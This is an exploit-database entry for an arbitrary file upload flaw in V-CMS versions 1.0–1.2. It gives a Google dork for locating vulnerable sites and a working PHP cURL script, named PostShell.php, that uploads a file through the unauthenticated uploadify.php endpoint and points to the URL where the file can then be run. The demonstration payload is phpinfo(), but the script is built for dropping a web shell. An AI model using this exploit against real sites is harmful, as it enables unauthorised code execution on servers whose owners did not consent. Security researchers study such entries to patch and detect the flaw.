##################################################
# Description : V-CMS A Open Source (GNU) CushyCMS / SurrealCMS Clone Arbitrary File Upload Vulnerability
# Version : 1.0 - 1.2
# Google Dork : "Powered by: V-CMS v1.0" or "Powered by: V-CMS v1.2"
# Files : https://sourceforge.net/projects/v-cms/files/latest/download?source=files
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit Code :
PostShell.php :
<?php
$uploadfile="phpinfo.php";
$ch = curl_init("http://exemple.com/includes/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/theme/default/js/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Url : http://exemple.com/includes/js/uploadify/phpinfo.php
phpinfo.php :
<?php
phpinfo();
?> |
↧
V-CMS A Open Source (GNU) CushyCMS / SurrealCMS Clone Arbitrary File Upload
↧